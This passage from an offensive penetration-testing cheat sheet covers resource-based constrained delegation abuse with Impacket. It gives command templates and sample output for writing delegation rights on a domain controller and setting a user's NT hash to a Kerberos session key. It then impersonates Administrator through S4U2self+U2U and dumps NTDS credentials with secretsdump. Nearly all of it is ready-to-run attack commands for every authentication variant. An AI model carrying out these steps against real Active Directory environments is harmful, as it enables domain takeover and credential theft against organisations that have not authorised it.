[*] Accounts allowed to act on behalf of other identity:
[*] apple.seed (S-1-5-21-4029599044-1972224926-2225194048-1126)
# NTLM
impacket-rbcd '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP> -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -delegate-from 'apple.seed' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] apple.seed can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] apple.seed (S-1-5-21-3542429192-2036945976-3483670807-11601)
# Password-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC_IP> -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed:Password123!' -k -dc-ip 10.10.11.10 -delegate-from 'apple.seed' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] apple.seed can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] apple.seed (S-1-5-21-3542429192-2036945976-3483670807-11601)
# NTLM-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>' -hashes :<HASH> -k -dc-ip <DC_IP> -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -delegate-from 'apple.seed' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] apple.seed can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] apple.seed (S-1-5-21-3542429192-2036945976-3483670807-11601)
# Ticket-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>' -k -dc-ip <DC_IP> -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -k -dc-ip 10.10.11.10 -delegate-from 'apple.seed' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] apple.seed can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] apple.seed (S-1-5-21-3542429192-2036945976-3483670807-11601)
2. Generate NTLM Hash
Note: The NT hash is MD4 over the UTF-16LE encoding of the password; on OpenSSL 3 the md4 digest needs the legacy provider (add -provider legacy -provider default).
iconv -f ASCII -t UTF-16LE <(printf '<PASSWORD>') | openssl dgst -md4
Sample Output:
$ iconv -f ASCII -t UTF-16LE <(printf 'Password123!') | openssl dgst -md4
MD4(stdin)= 2B576ACBE6BCFDA7294D6BD18041B8FE
3. Request a Ticket
# NTLM
impacket-getTGT '<DOMAIN>/<USER>@<TARGET>' -hashes ':<HASH>'
Sample Output:
$ impacket-getTGT 'example.com/apple.seed@DC.example.com' -hashes ':2B576ACBE6BCFDA7294D6BD18041B8FE'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in apple.seed@DC.example.com.ccache
4. Get Session Key
# Pass-the-ticket
export KRB5CCNAME='<CCACHE>'
Sample Output:
$ export KRB5CCNAME='apple.seed@DC.example.com.ccache'
# Get ticket session key
impacket-describeTicket '<CCACHE>' | grep 'Ticket Session Key'
Sample Output:
$ impacket-describeTicket apple.seed@DC.example.com.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key : 49e0cd8abe883d869f5af9ad8556fb29
5. Set the Controlled User's NT Hash to the Session Key
# Password
impacket-changepasswd '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -dc-ip <DC_IP> -newhashes :<SESSION_KEY>
Sample Output:
$ impacket-changepasswd 'example.com/apple.seed:Password123!@dc.example.com' -dc-ip 10.10.11.10 -newhashes :49e0cd8abe883d869f5af9ad8556fb29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\apple.seed
[*] Connecting to DCE/RPC as example.com\apple.seed
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
# NTLM
impacket-changepasswd '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> -dc-ip <DC_IP> -newhashes :<SESSION_KEY>
Sample Output:
$ impacket-changepasswd 'example.com/apple.seed@dc.example.com' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -newhashes :49e0cd8abe883d869f5af9ad8556fb29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\apple.seed
[*] Connecting to DCE/RPC as example.com\apple.seed
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
# Password-based Kerberos
impacket-changepasswd '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k -dc-ip <DC_IP> -newhashes :<SESSION_KEY>
Sample Output:
$ impacket-changepasswd 'example.com/apple.seed:Password123!@dc.example.com' -k -dc-ip 10.10.11.10 -newhashes :49e0cd8abe883d869f5af9ad8556fb29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\apple.seed
[*] Connecting to DCE/RPC as example.com\apple.seed
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
# NTLM-based Kerberos
impacket-changepasswd '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> -k -dc-ip <DC_IP> -newhashes :<SESSION_KEY>
Sample Output:
$ impacket-changepasswd 'example.com/apple.seed@dc.example.com' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -newhashes :49e0cd8abe883d869f5af9ad8556fb29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\apple.seed
[*] Connecting to DCE/RPC as example.com\apple.seed
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
# Ticket-based Kerberos
impacket-changepasswd '<DOMAIN>/<USER>@<TARGET>' -k -dc-ip <DC_IP> -newhashes :<SESSION_KEY>
Sample Output:
$ impacket-changepasswd 'example.com/apple.seed@dc.example.com' -k -dc-ip 10.10.11.10 -newhashes :49e0cd8abe883d869f5af9ad8556fb29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\apple.seed
[*] Connecting to DCE/RPC as example.com\apple.seed
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
6. Get a Service Ticket
# Password
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER> -u2u
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/apple.seed:Password123!' -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator -u2u
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@example.com.ccache
# NTLM
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER> -u2u
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator -u2u
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@example.com.ccache
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER> -u2u
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/apple.seed:Password123!' -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator -u2u
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@example.com.ccache
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<USER>' -hashes :<HASH> -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER> -u2u
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator -u2u
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@example.com.ccache
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<USER>' -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER> -u2u
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/apple.seed' -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator -u2u
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.example.com@example.com.ccache
7. Secrets Dump
# Pass-the-ticket
export KRB5CCNAME='<CCACHE_2>'
Sample Output:
$ export KRB5CCNAME='Administrator@cifs_DC.example.com@example.com.ccache'
# Ticket-based Kerberos
impacket-secretsdump <TARGET_USER>@<TARGET> -k -no-pass
Sample Output:
$ impacket-secretsdump administrator@dc.example.com -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ddf32e17a6ac5ce04a8ecbf782ca509:::
---[SNIP]---
[*] Cleaning up...